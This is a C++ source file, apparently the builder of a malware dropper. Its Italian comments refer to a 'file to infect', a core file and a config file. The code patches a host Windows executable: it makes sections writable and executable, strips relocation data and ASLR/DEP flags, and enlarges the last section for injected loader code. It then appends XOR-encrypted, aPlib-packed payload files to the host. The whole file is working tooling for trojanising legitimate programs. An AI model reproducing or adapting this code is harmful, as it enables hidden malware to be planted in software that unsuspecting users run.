// drop.cpp : Defines the entry point for the console application.
//

#define WIN32_LEAN_AND_MEAN
#define _CRT_SECURE_NO_DEPRECATE
#define STRICT

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <ctype.h>

#define PAGE_SIZE 4096

#pragma comment(linker, "/SECTION:.text,RWE")
#pragma warning(disable : 4313)

#ifdef __GNUC__
#include "../aPlib/lib/elf32/aplib.h"
#else
#include "../aplib/lib/dll/aplib.h"
#endif

#include "drop.h"
#include "resource.h"

#define PAGE_SIZE 4096

#pragma comment(linker, "/SECTION:.text,RWE")
#pragma warning(disable : 4311 4312)

void UnloadPE(PEInfo *pPEInfo);

LoaderInfo g_LoaderInfo;

#define MEM_COMMIT 0
#define PAGE_READWRITE 0
#define GENERIC_READ 0
#define GENERIC_WRITE 0
#define FILE_SHARE_READ 0
#define FILE_SHARE_WRITE 0

#define INVALID_HANDLE_VALUE 0

#define OPEN_EXISTING 0

// File_XXX macro
#define FILE_BEGIN SEEK_SET
#define FILE_END SEEK_END
#define FILE_CUR SEEK_CUR

#define FILE_MAP_READ 0
#define FILE_MAP_WRITE 0

#define MEM_RELEASE 0


void DebugPrint_Enter(char *szName)
{
#ifdef _CONSOLE
	printf("\nEnter in %s", szName); fflush(stdout);
#endif
}

void DebugPrint_Leave(char *szName)
{
#ifdef _CONSOLE
	printf("\nLeave %s", szName); fflush(stdout);
#endif
}

/***
 * VirtualAlloc
 * 
 ***/
LPVOID VirtualAlloc(LPVOID lpAddress, DWORD dwSize/*, DWORD flAllocationType, DWORD flProtect*/)
{
#ifdef _CONSOLE
	printf("\nEnter in VirtualAlloc: %d", dwSize);
#endif
	LPVOID ptr = malloc(dwSize);

	if (ptr != NULL)
	{
		memset(ptr, 0x00, dwSize);
	}

#ifdef _CONSOLE
	printf("\nLeave in VirtualAlloc: %x", ptr);
#endif
	fflush(stdout);
	return ptr;
}


/***
 * SetFilePointer
 ***/
void SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod)
{
	DebugPrint_Enter("SetFilePointer");

	fseek(hFile, lDistanceToMove, dwMoveMethod);

	DebugPrint_Leave("SetFilePointer");
}

/***
 * GetFileSize
 ***/
ULONG GetFileSize(HANDLE hFile, DWORD lpFileSizeHigh)
{
	fpos_t curr_pos;
	fpos_t last_pos;

	if (fgetpos(hFile, &curr_pos) != 0)
		return -1;

	fseek(hFile, 0, SEEK_END);	// Last byte
	
	if (fgetpos(hFile, &last_pos) == 0)
	{
	}

	fsetpos(hFile, &curr_pos);
	
	#ifdef __GNUC__
	return last_pos.__pos;
	#else
	return (ULONG)last_pos;
	#endif
}



/***
 * WriteFile
 ***/
BOOL WriteFile(HANDLE hFile, void* lpBuffer, DWORD nNumberOfBytesToWrite, DWORD *lpNumberOfBytesWritten, DWORD)
{
	DebugPrint_Enter("WriteFile");

	size_t result = fwrite(lpBuffer, nNumberOfBytesToWrite, 1, hFile);

	DebugPrint_Leave("WriteFile");

	if (result > 0) 
		return TRUE;

	return FALSE;
	//return (fwrite(lpBuffer, nNumberOfBytesToWrite, 1, hFile) > 0);
}

/***
 * ReadFile
 ***/
BOOL ReadFile(HANDLE hFile, void *lpBuffer, DWORD nNumberOfBytesToRead, DWORD* lpNumberOfBytesRead, DWORD)
{
#ifdef _CONSOLE
	printf("\nEnter in ReadFile %x:%x:%d", hFile, lpBuffer, nNumberOfBytesToRead);
#endif
	fflush(stdout);

	size_t bytes = fread(lpBuffer, nNumberOfBytesToRead, 1, hFile);

	if (lpNumberOfBytesRead != NULL)
		*lpNumberOfBytesRead = (DWORD) bytes;

#ifdef _CONSOLE
	printf("\nLeave ReadFile %d", bytes);
#endif

	if (bytes >= 0)
		return TRUE;

	return FALSE;
}

HANDLE CreateFile(CHAR* FileName, DWORD mask, DWORD mask1, DWORD mask2, DWORD mask3, DWORD mask4, DWORD mask5)
{
	HANDLE handle = fopen(FileName, "r+b");

	if (handle != NULL)
		fseek(handle, 0, SEEK_SET);
#ifdef _CONSOLE
	printf("Leave CreateFile %x:%s", handle, FileName);
#endif
	return handle;
}

void* MapViewOfFile(HANDLE hFileMappingObject, DWORD dwDesideredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, DWORD dwNumberOfBytesToMap)
{
#ifdef _CONSOLE
	printf("\nEnter in MapViewOfFile"); fflush(stdout);
#endif

	LPVOID addr = VirtualAlloc(NULL, GetFileSize(hFileMappingObject,NULL) + PAGE_SIZE * 5/*, 0, 0*/);

	fseek(hFileMappingObject, dwFileOffsetLow, SEEK_SET);

	if (dwNumberOfBytesToMap == 0)
		dwNumberOfBytesToMap = GetFileSize(hFileMappingObject, 0);

	ReadFile(hFileMappingObject, addr, dwNumberOfBytesToMap, NULL, NULL);

	DebugPrint_Leave("MapViewOfFile");
	
	return addr;
}

/***
 * UnmapViewOfFile
 * Remove from memory the file addr ...
 ***/
BOOL UnmapViewOfFile(PEInfo *ptr)
{
	DebugPrint_Enter("UnmapViewOfFile");

	fseek(ptr->hPEFile, 0, SEEK_SET);
	fpos_t curr_pos;
	fgetpos(ptr->hPEFile, &curr_pos);

	size_t result = fwrite(ptr->FileBase, ptr->fileSize + PAGE_SIZE*5, 1, ptr->hPEFile);

	DebugPrint_Leave("UnmapViewOfFile");

	if (result != 0)
		return TRUE;

	return FALSE;
}


/***
 * CloseHandle
 * Close the handle
 ***/
void CloseHandle(HANDLE hObject)
{
	DebugPrint_Enter("CloseHandle");
	fclose(hObject);
	DebugPrint_Leave("CloseHandle");
}

HANDLE CreateFileMapping(HANDLE hFile, char *, DWORD, char*, int size, char*)
{
	DebugPrint_Enter("CreateFileMapping");
	DebugPrint_Leave("CreateFileMapping");
	return hFile;
}

PIMAGE_SECTION_HEADER __stdcall GetEnclosingSectionHeader(DWORD rva, PIMAGE_NT_HEADERS pNTHeader)
{
	DebugPrint_Enter("GetEnclosingSectionHeader");

	PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(pNTHeader);
    unsigned i;
    
    for ( i=0; i < pNTHeader->FileHeader.NumberOfSections; i++)
    {
        if ( (rva >= section[i].VirtualAddress) && 
             (rva < (section[i].VirtualAddress + section[i].Misc.VirtualSize))) {
		DebugPrint_Leave("GetEnclosingSectionHeader");
            return &section[i];
	}
    }
    
	DebugPrint_Leave("GetEnclosingSectionHeader - ERROR");
    return 0;
}

DWORD __stdcall RvaToOffset(DWORD Rva, PIMAGE_NT_HEADERS ImageNtHeaders)
{
	DWORD Offset = Rva;
	IMAGE_SECTION_HEADER *Img;

	DebugPrint_Enter("RvaToOffset");
#ifdef _CONSOLE
	printf("\nRvaToOffset %x:%x", Rva, ImageNtHeaders);	fflush(stdout);
#endif

	Img = IMAGE_FIRST_SECTION(ImageNtHeaders);

	if (Rva < Img->PointerToRawData)
		return Rva;

	for (int i = 0; i < ImageNtHeaders->FileHeader.NumberOfSections; i++)
	{
		if (Rva >= Img[i].VirtualAddress &&
			Rva < (Img[i].VirtualAddress +
			Img[i].SizeOfRawData))
		{
			Offset -= Img[i].VirtualAddress;
			Offset += Img[i].PointerToRawData;
			
			DebugPrint_Leave("RvaToOffset");
			return Offset;
		}
	}

	DebugPrint_Leave("RvaToOffset NULL");

	return NULL;

}

/***
 * OffsetToRva
 ***/
DWORD __stdcall OffsetToRva(DWORD Offset, PIMAGE_NT_HEADERS ImageNtHeaders)
{
	DWORD Rva = Offset, Limit, Start;
	IMAGE_SECTION_HEADER *Img;

	DebugPrint_Enter("OffsetToRva");
#ifdef _CONSOLE
	printf("\nOffsetToRVA %x:%x", Offset, ImageNtHeaders);	fflush(stdout);
#endif

	Img = IMAGE_FIRST_SECTION(ImageNtHeaders);

	if (Offset < Img->PointerToRawData)
		return Offset;

	for (int i = 0; i < ImageNtHeaders->FileHeader.NumberOfSections; i++)
	{
		if (Img[i].PointerToRawData)
			Start = Img[i].PointerToRawData;
		else
			Start = Img[i].VirtualAddress;

		if (Img[i].SizeOfRawData)
			Limit = Img[i].SizeOfRawData;
		else
			Limit = Img[i].Misc.VirtualSize;

		if (Offset >= Start && Offset < (Start + Limit))
		{
			if (Img[i].PointerToRawData != 0)
			{
				Offset -= Img[i].PointerToRawData;
				Offset += Img[i].VirtualAddress;
			}

			return Offset;
		}
	}

	DebugPrint_Leave("OffsetToRva");

	return NULL;
}


/***
 *	RoundUp
 ***/
DWORD __stdcall RoundUp(DWORD value, DWORD base)
{
	DebugPrint_Enter("RoundUp");

	DWORD tmpValue = value;
	while((tmpValue % base) != 0)
		tmpValue++;
	return tmpValue;
}

/**
 *	RoundDown
 **/
DWORD __stdcall RoundDown(DWORD value, DWORD base)
{
	DebugPrint_Enter("RoundDown");
	while((value % base) != 0)
		value--;

	return value;
}

/***
 *	IntervalRand
 ***/
DWORD __stdcall IntervalRand(DWORD Low, DWORD High)
{
	DebugPrint_Enter("IntervalRand");

	DWORD dwRand;

	dwRand = (unsigned int)(Low + (double)rand() * (High - Low + 1) / RAND_MAX);

	return dwRand;
}

/**
 * UPX
 * Scan Sections looking "UPX" section(s).
 **/
bool UPX(PEInfo *pe)
{
	PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pe->ImageNtHeaders);
	DebugPrint_Enter("Scanning UPX");

	for(ULONG i = 0; i < pe->ImageFileHeader->NumberOfSections; i++) {
		if (strstr((char *)pSection[i].Name, "UPX") != NULL) {
#ifdef _CONSOLE
			printf("UPX section (%s). Unsupported stream\n", pSection[i].Name);
#endif
			return true;
		}
	}
	return false;
}

bool ASPACK(PEInfo *pe)
{
	PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pe->ImageNtHeaders);
	DebugPrint_Enter("Scanning ASPACK");

	for(ULONG i = 0; i < pe->ImageFileHeader->NumberOfSections; i++) {
		if (strstr((char *)pSection[i].Name, "aspack") != NULL) {
#ifdef _CONSOLE
			printf("ASPACK section (%s). Unsupported stream\n", pSection[i].Name);
#endif
			return true;
		}
	}
	return false;
}

/***
 * LoadPE
 ***/
PEInfo *LoadReadOnlyPE(CHAR *FileName)
{
	PEInfo *pPEInfo;

	if(FileName == NULL)
	{
#ifdef _CONSOLE
		printf("LoadPE: No input file specified.\n");
#endif
		return NULL;
	}

	pPEInfo = (PEInfo *)VirtualAlloc(NULL, sizeof(PEInfo)/*, MEM_COMMIT, PAGE_READWRITE*/);
	if(pPEInfo == NULL)
	{
#ifdef _CONSOLE
		printf("LoadPE: Could not allocate %d bytes of memory.\n", sizeof(PEInfo));
#endif
		return NULL;
	}

	pPEInfo->hPEFile = CreateFile(FileName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
	if(pPEInfo->hPEFile == INVALID_HANDLE_VALUE)
	{
#ifdef _CONSOLE
		printf("LoadPE: Could not open %s.\n", FileName);
#endif
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->fileSize = GetFileSize(pPEInfo->hPEFile, NULL);

	pPEInfo->hMappedFile = CreateFileMapping(pPEInfo->hPEFile, NULL, PAGE_READWRITE, NULL, pPEInfo->fileSize + PAGE_SIZE*5, NULL);
	if(pPEInfo->hMappedFile == INVALID_HANDLE_VALUE)
	{
#ifdef _CONSOLE
		printf("LoadPE: Could not create file mapping, handle = %08x.\n", (ULONG_PTR)pPEInfo->hPEFile);
#endif
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->FileBase = MapViewOfFile(pPEInfo->hMappedFile, FILE_MAP_READ | FILE_MAP_WRITE, NULL, NULL, 0);
	if(pPEInfo->FileBase == NULL)
	{
#ifdef _CONSOLE
		printf("LoadPE: Could not map file into memory, map handle = %08x.\n", (ULONG_PTR)pPEInfo->hMappedFile);
#endif
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->ImageDosHeader = (PIMAGE_DOS_HEADER)pPEInfo->FileBase;
	if(pPEInfo->ImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
	{
#ifdef _CONSOLE
		printf("LoadPE: %s is not a valid pe file.\n", FileName);
#endif
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->ImageNtHeaders = MakePtr(PIMAGE_NT_HEADERS, pPEInfo->FileBase, pPEInfo->ImageDosHeader->e_lfanew);

	/*
		(PIMAGE_NT_HEADERS)(((char *)pPEInfo->FileBase + pPEInfo->ImageDosHeader->e_lfanew));
	*/

	if(pPEInfo->ImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
	{
#ifdef _CONSOLE
		printf("LoadPE: %s is not a valid pe file.\n", FileName);
#endif
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->ImageFileHeader = &pPEInfo->ImageNtHeaders->FileHeader;
	pPEInfo->ImageOptionalHeader = &pPEInfo->ImageNtHeaders->OptionalHeader;

	if (UPX(pPEInfo) || ASPACK(pPEInfo)) {
#ifdef _CONSOLE
		printf("Packer found.. Cannot continue.\n");
#endif
		CloseHandle(pPEInfo->hPEFile);
		return NULL;
	}

	PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pPEInfo->ImageNtHeaders);

	// TO DO!
	/*if (pPEInfo->ImageOptionalHeader->SizeOfImage > pPEInfo->fileSize) {
		CloseHandle(pPEInfo->hPEFile);
		return NULL;
	}*/


	pPEInfo->oldHeaderSize = RvaToOffset(pSection->VirtualAddress, pPEInfo->ImageNtHeaders);
	pPEInfo->EntryPointOffset = RvaToOffset(pPEInfo->ImageOptionalHeader->AddressOfEntryPoint, pPEInfo->ImageNtHeaders);

	return pPEInfo;
}



/***
 * LoadPE
 ***/
PEInfo *LoadPE(CHAR *FileName)
{
	PEInfo *pPEInfo;

	if(FileName == NULL)
	{
#ifdef _CONSOLE
		printf("LoadPE: No input file specified.\n");
#endif
		return NULL;
	}

	pPEInfo = (PEInfo *)VirtualAlloc(NULL, sizeof(PEInfo)/*, MEM_COMMIT, PAGE_READWRITE*/);
	if(pPEInfo == NULL)
	{
#ifdef _CONSOLE
		printf("LoadPE: Could not allocate %d bytes of memory.\n", sizeof(PEInfo));
#endif
		return NULL;
	}

	pPEInfo->hPEFile = CreateFile(FileName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
	if(pPEInfo->hPEFile == INVALID_HANDLE_VALUE)
	{
#ifdef _CONSOLE
		printf("LoadPE: Could not open %s.\n", FileName);
#endif
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->fileSize = GetFileSize(pPEInfo->hPEFile, NULL);

	pPEInfo->hMappedFile = CreateFileMapping(pPEInfo->hPEFile, NULL, PAGE_READWRITE, NULL, pPEInfo->fileSize + PAGE_SIZE*5, NULL);
	if(pPEInfo->hMappedFile == INVALID_HANDLE_VALUE)
	{
#ifdef _CONSOLE
		printf("LoadPE: Could not create file mapping, handle = %08x.\n", (ULONG_PTR)pPEInfo->hPEFile);
#endif
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->FileBase = MapViewOfFile(pPEInfo->hMappedFile, FILE_MAP_READ | FILE_MAP_WRITE, NULL, NULL, 0);
	if(pPEInfo->FileBase == NULL)
	{
#ifdef _CONSOLE
		printf("LoadPE: Could not map file into memory, map handle = %08x.\n", (ULONG_PTR)pPEInfo->hMappedFile);
#endif
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->ImageDosHeader = (PIMAGE_DOS_HEADER)pPEInfo->FileBase;
	if(pPEInfo->ImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
	{
#ifdef _CONSOLE
		printf("LoadPE: %s is not a valid pe file.\n", FileName);
#endif
		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->ImageNtHeaders = MakePtr(PIMAGE_NT_HEADERS, pPEInfo->FileBase, pPEInfo->ImageDosHeader->e_lfanew);

	/*
		(PIMAGE_NT_HEADERS)(((char *)pPEInfo->FileBase + pPEInfo->ImageDosHeader->e_lfanew));
	*/

	if(pPEInfo->ImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
	{

#ifdef _CONSOLE
		printf("LoadPE: %s is not a valid pe file.\n", FileName);
#endif

		UnloadPE(pPEInfo);
		return NULL;
	}

	pPEInfo->ImageFileHeader = &pPEInfo->ImageNtHeaders->FileHeader;
	pPEInfo->ImageOptionalHeader = &pPEInfo->ImageNtHeaders->OptionalHeader;

	if (UPX(pPEInfo) || ASPACK(pPEInfo)) {
		printf("Packer found.. Cannot continue.\n");
		CloseHandle(pPEInfo->hPEFile);
		return NULL;
	}

	PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pPEInfo->ImageNtHeaders);

	// TO DO!
	/*if (pPEInfo->ImageOptionalHeader->SizeOfImage > pPEInfo->fileSize) {
		CloseHandle(pPEInfo->hPEFile);
		return NULL;
	}*/


	pPEInfo->oldHeaderSize = RvaToOffset(pSection->VirtualAddress, pPEInfo->ImageNtHeaders);
	pPEInfo->EntryPointOffset = RvaToOffset(pPEInfo->ImageOptionalHeader->AddressOfEntryPoint, pPEInfo->ImageNtHeaders);

	pPEInfo->OldEntryBackup = malloc(pPEInfo->oldHeaderSize);
	memcpy(pPEInfo->OldEntryBackup, pPEInfo->FileBase, pPEInfo->oldHeaderSize);

	unsigned long sumRawSize = pSection[0].PointerToRawData;
	unsigned long virtualSize = pSection[0].PointerToRawData;

	for(ULONG i = 0; i < pPEInfo->ImageFileHeader->NumberOfSections; i++) {
		sumRawSize += pSection[i].SizeOfRawData;
		virtualSize += pSection[i].Misc.VirtualSize;
		pSection[i].Characteristics |= IMAGE_SCN_MEM_WRITE; //all sections must be writable
	}
	
	// Delete references to relocation table!
	pPEInfo->ImageNtHeaders->OptionalHeader.DataDirectory[0x05].Size = 0x00;
	pPEInfo->ImageNtHeaders->OptionalHeader.DataDirectory[0x05].VirtualAddress = 0x00;
	
	pPEInfo->ImageNtHeaders->OptionalHeader.DllCharacteristics &=
		0xFBBF;

	pPEInfo->ImageNtHeaders->OptionalHeader.DllCharacteristics = 0x0;
	
	pPEInfo->WorkingSection = &pSection[pPEInfo->ImageFileHeader->NumberOfSections - 1];
	
	if (sumRawSize < pPEInfo->fileSize) {
		pPEInfo->WorkingSection->Misc.VirtualSize += pPEInfo->fileSize - sumRawSize;
		pPEInfo->WorkingSection->SizeOfRawData += pPEInfo->fileSize - sumRawSize;
	}

	DWORD alignSize = RoundDown(pPEInfo->ImageOptionalHeader->SizeOfImage - sumRawSize, pPEInfo->ImageOptionalHeader->SectionAlignment);
	DWORD diffSize = pPEInfo->fileSize - sumRawSize;

	g_LoaderInfo.CurrentOffset = (DWORD)((PUCHAR)pPEInfo->WorkingSection->PointerToRawData + pPEInfo->WorkingSection->SizeOfRawData);

	pPEInfo->WorkingSection->SizeOfRawData += PAGE_SIZE*5;
	pPEInfo->WorkingSection->SizeOfRawData = RoundUp(pPEInfo->WorkingSection->SizeOfRawData, pPEInfo->ImageOptionalHeader->FileAlignment);
	pPEInfo->WorkingSection->Misc.VirtualSize += PAGE_SIZE*5;

	if (pPEInfo->WorkingSection->SizeOfRawData != RoundUp(pPEInfo->WorkingSection->Misc.VirtualSize, pPEInfo->ImageOptionalHeader->FileAlignment))
		pPEInfo->WorkingSection->SizeOfRawData = RoundUp(pPEInfo->WorkingSection->Misc.VirtualSize, pPEInfo->ImageOptionalHeader->FileAlignment);

	pPEInfo->ImageOptionalHeader->SizeOfImage += PAGE_SIZE*5;

	pPEInfo->WorkingSection->Characteristics = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | 
												IMAGE_SCN_CNT_CODE | IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_CNT_UNINITIALIZED_DATA;

	//if load config directory is not 0, SEH inside the loader will not work, is related to RtlLookupFunctionTable inside ntdll.dll
	pPEInfo->ImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG].VirtualAddress = 0;
	pPEInfo->ImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG].Size = 0;

	unsigned long newRawSize = pSection[0].PointerToRawData;
	unsigned long newVirtualSize = pSection[0].PointerToRawData;

	for(ULONG i = 0; i < pPEInfo->ImageFileHeader->NumberOfSections; i++) {
		newRawSize += pSection[i].SizeOfRawData;
		newVirtualSize += pSection[i].Misc.VirtualSize;
	}

	// SizeOfImage!
	unsigned long newSizeOfImage = pSection[0].PointerToRawData;

	for(ULONG i = 0; i < pPEInfo->ImageFileHeader->NumberOfSections; i++) 
		newSizeOfImage += RoundUp(pSection[i].Misc.VirtualSize, pPEInfo->ImageOptionalHeader->SectionAlignment);

	//pPEInfo->ImageOptionalHeader->SizeOfImage = RoundUp(newRawSize + alignSize, pPEInfo->ImageOptionalHeader->SectionAlignment);
	pPEInfo->ImageOptionalHeader->SizeOfImage = RoundUp(newSizeOfImage, pPEInfo->ImageOptionalHeader->SectionAlignment);

	DebugPrint_Leave("PEInfo");

	return pPEInfo;
}


void UnloadPE(PEInfo *pPEInfo)
{
	if(pPEInfo != NULL)
	{
		if(pPEInfo->FileBase != NULL)
			UnmapViewOfFile(pPEInfo);

		/*if(pPEInfo->hMappedFile != INVALID_HANDLE_VALUE)
			CloseHandle(pPEInfo->hMappedFile);*/

		if(pPEInfo->hPEFile != INVALID_HANDLE_VALUE)
			CloseHandle(pPEInfo->hPEFile);

		free(pPEInfo);
	}
}

void EncryptHeader(AppendFile *hdr)
{
	PUCHAR ptr = (PUCHAR)hdr;

	for(int i = 0; i < sizeof(AppendFile); i++)
		ptr[i] ^= 0x66;
}
// _param[0] = NULL;				// param[0] NULL
// _param[1] = SelectHost();		// Nome file da infettare...	
// _param[2] = configuration[0];	// directory di installazione
// _param[3] = H4_CoreTmp;			// core file name
// _param[4] = H4_ConfTmp;			// config file 
		
int _entry_main(int	num_param, CHAR* param[])
{
	//CHAR unpackDir[256];
	DWORD seekOffset;
	AppendFile af;
	DWORD BytesRead;
	BOOL DebugVersion = FALSE;

	DWORD _xorPattern = rand() % 256;

	if(num_param < 3)
		return -1;
	
	BOOL ManifestTest = FALSE;

	int _lastParam = 0;

	CHAR **params = new CHAR*[num_param];
	int baseParam = 0;

	for(int i = 0; i < num_param; i++)
	{
		if (param[i] == NULL) {
			params[baseParam++] = param[i];
		} else {
			if (param[i][0] == '-' || param[i][0] == '/') {
				char tag = param[i][1];
				bool ignore = false;

				switch(tag) {
					case 'd':
					case 'D':
						if (strlen(param[i]) == 2) {
							DebugVersion = TRUE;
							ignore = true;
						}
						break;
					case 'm':
					case 'M':
						if (strlen(param[i]) == 2) {
							ManifestTest = TRUE;
							ignore = true;
						}
						break;
					case 'x':
					case 'X':
						if (strlen(param[i]) >= 2 && strlen(param[i]) <= 5) {
							for(int z = 2; z < strlen(param[i]); z++)
								if (isdigit(param[i][z]) == 0)
									ignore = true;

							if (ignore) 
								ignore = false;
							else {
								_xorPattern = atoi(&param[i][2]);
								ignore = true;
							}
								
						}
					default:	// invalid char..
						break;
				}

				if (ignore) {
					// nothing to do...
				} else {
					params[baseParam++] = param[i];
				}
			} else {
				params[baseParam++] = param[i];
			}
		}
	}

	_lastParam = baseParam;

	strncpy((char *)g_LoaderInfo.UnpackDir, params[2], strlen(params[2]));

	PEInfo *pPEInfo;

	pPEInfo = LoadPE(params[1]);
	if (pPEInfo == NULL)
	{
		printf("LoadPE failed");
		return -1;
	}

	g_LoaderInfo.pPEInfo = pPEInfo;
	srand((unsigned int)time(NULL));
	
	if (ManifestTest) {
		DebugPrint_Enter("Changing Manifest...");
		if (ChangeManifest(pPEInfo) == 0x00)
			DebugPrint_Leave("Done...");
		else {
			DebugPrint_Leave("Error...");
			DebugPrint_Leave("Try to inject without manifest flag");
			return -10;
		}


	}
	DebugPrint_Enter("Continue Work INIT!");
	ContinueWork(&g_LoaderInfo, _xorPattern, DebugVersion);
	DebugPrint_Leave("Continue Work END!");

	seekOffset = pPEInfo->WorkingSection->PointerToRawData + pPEInfo->WorkingSection->SizeOfRawData;
	UnloadPE(pPEInfo);

	HANDLE hPEFile = CreateFile(param[1], GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	if(hPEFile == INVALID_HANDLE_VALUE)
	{
		printf("Could not open pe file for append.\n");
		return -1;
	}

	SetFilePointer(hPEFile, seekOffset, NULL, FILE_BEGIN);

	for(int i = 3; i < _lastParam; i++)
	{
		HANDLE hFileToAppend = CreateFile(params[i], GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
		if(hFileToAppend == INVALID_HANDLE_VALUE)
		{
			printf("Could not open %s.\n", param[i]);
			CloseHandle(hPEFile);
			return -1;
		}

		int currSize = GetFileSize(hFileToAppend, NULL);

		PCHAR buffer = (PCHAR)VirtualAlloc(NULL, GetFileSize(hFileToAppend, NULL)/*, MEM_COMMIT, PAGE_READWRITE*/);
		if(buffer == NULL)
		{
			printf("Could not allocate buffer.\n");
			CloseHandle(hFileToAppend);
			CloseHandle(hPEFile);
			return -1;
		}

		if(!ReadFile(hFileToAppend, buffer, GetFileSize(hFileToAppend, NULL), &BytesRead, NULL))
		{
			printf("Error while reading file %s.\n", param[i]);
			free(buffer/*, 0, MEM_RELEASE*/);
			CloseHandle(hFileToAppend);
			CloseHandle(hPEFile);
			return -1;
		}

		for (int x=0; x < currSize; x++)
			buffer[x] ^= (unsigned char)_xorPattern;	// Patch the random patternd

		PCHAR packBuffer = (PCHAR)VirtualAlloc(NULL, aP_max_packed_size(GetFileSize(hFileToAppend, NULL))/*, MEM_COMMIT, PAGE_READWRITE*/);
		if(packBuffer == NULL)
		{
			printf("Could not allocate buffer.\n");
			free(buffer/*, 0, MEM_RELEASE*/);
			CloseHandle(hFileToAppend);
			CloseHandle(hPEFile);
			return -1;
		}

		PCHAR workBuffer = (PCHAR)VirtualAlloc(NULL, aP_workmem_size(GetFileSize(hFileToAppend, NULL))/*, MEM_COMMIT, PAGE_READWRITE*/);
		if(packBuffer == NULL)
		{
			printf("Could not allocate buffer.\n");
			free(buffer);
			free(packBuffer);
			CloseHandle(hFileToAppend);
			CloseHandle(hPEFile);
			return -1;
		}

		ULONG packedSize = aP_pack(buffer, packBuffer, GetFileSize(hFileToAppend, NULL), workBuffer, NULL, NULL);

		memset(&af, 0, sizeof(af));
		
		// Choppa il pathname assoluto
		char * fname = strrchr(param[i], '\\');
		
		if( fname != NULL ) 
			fname++;
		else
			fname = param[i];

		strncpy((char *)af.fileName, fname, strlen(fname));

		af.fileSize = GetFileSize(hFileToAppend, NULL);
		af.packFileSize = packedSize;
		af.signature = 0x504b4344; //"DCKP";//Mario--2.

		EncryptHeader(&af);

		WriteFile(hPEFile, &af, sizeof(af), &BytesRead, NULL);
		WriteFile(hPEFile, packBuffer, packedSize, &BytesRead, NULL);
		CloseHandle(hFileToAppend);
		free(buffer);
		free(packBuffer);
		free(workBuffer);
		printf("%s appended.\n", param[i]);
		
	}
	CloseHandle(hPEFile);

	if (params != NULL) 
		delete params;

	printf("Done.\n");
	return 0;
}
